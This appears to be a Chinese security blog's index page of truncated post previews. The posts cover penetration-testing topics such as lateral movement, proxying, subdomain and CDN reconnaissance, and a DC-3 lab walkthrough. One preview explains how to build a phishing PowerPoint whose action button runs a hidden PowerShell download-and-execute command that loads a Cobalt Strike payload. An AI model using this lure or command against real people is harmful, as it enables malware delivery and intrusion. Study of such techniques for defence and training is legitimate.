在一次医院客户端测试中，发现了一个有趣的逻辑漏洞，打开客户端是医院常见的登录页面，通过常见用户名猜测发现了dba为管理员用户，同时发现123用户已停用，本来打算写个用户名枚举下班，突然峰回路转 

# 反序列化 ### php魔术方法 1、__get、__set 这两个方法是为在类和他们的父类中没有声明的属性而设计的 __get( $property ) 当调用一个未定义的属性时访问此方法 __set( $property, $value ) 给一个未定义的属性赋值时调用 这里的没有声明包括访问控制为proteced,private

## 快速横向渗透 #### 什么是内网横向攻击 当通过外部打点进入到目标内网时，需要利用现有的资源尝试获取更多的凭证与权限，进而达到控制整个内网、拥有最高权限、发动 APT （高级持续性威胁攻击）等目地。 在攻防演练中，攻击方需要在有限的时间内近可能的获取更多的权限，因此必须具备高效的横向攻击思路。本次对内网横向攻击的技巧和方法进行总结。

## 内网代理转发 #### 背景前言 在平时的渗透测试过程中经常会用到端口转发，通过代理脚本将内网流量代到本地进行访问，方便下一步对内网进行横向渗透。 当拿下内网一台主机的控制权后，需要通过代理转发的方式进入内网，整理几种常见的内网代理转发方法。 本次以远程桌面连接来进行说明，介绍几种常用的连接方式。 ## 正向代理及反向代

## 真实ip查找 #### CDN CDN 的全称是Content Delivery Network，即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络，依靠部署在各地的边缘服务器，通过中心平台的负载均衡、内容分发、调度 等功能模块，使用户就近获取所需内容，降低网络拥塞，提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。通俗点就是一种缓

## 为什么要收集域名信息 1、子域名枚举可以在测试范围内发现更多的域或子域，这将增大漏洞发现的几率。 2、有些隐藏的、被忽略的子域上运行的应用程序可能帮助我们发现重大漏洞。 3、在同一个组织的不同域或应用程序中往往存在相同的漏洞。 ## 子域名收集方法 常用的子域名收集方法有爆破，google语法，证书查询，备案查询等方法。

## 内网信息收集 #### 本机信息收集 当我们拿到一台服务器权限时第一反应是：我是谁、我在哪儿、我能干什么。 #### 1、判断账户信息 查询当前账户信息，查看权限是否需要进一步提升权限。 windows：whoami、net user、net user “用户名”。 ![](https://n

### 1.企业架构收集 （1）官网 （2）网站 - 天眼查 [https://www.tianyancha.com/](https://www.tianyancha.com/) 可以查询企业下属单位或者下属所属公司 在

一、PPT钓鱼简单制作一个用于钓鱼的PPTX文件一般那种小白不知道PPT也能拿来钓鱼，这里主要是借用PPT中的”动作按钮”,我们在插入的地方，选择“动作按钮”然后在弹出的窗口处：比如填入上线CS的语句：powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('h

## DC系列 DC系列靶机是一个专门构建的易受攻击的实验室，目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战，但它的容易程度将取决于您的技能和知识以及您的学习能力 ------------ ## DC-3解题 #### 一、信息收集 1、arp扫描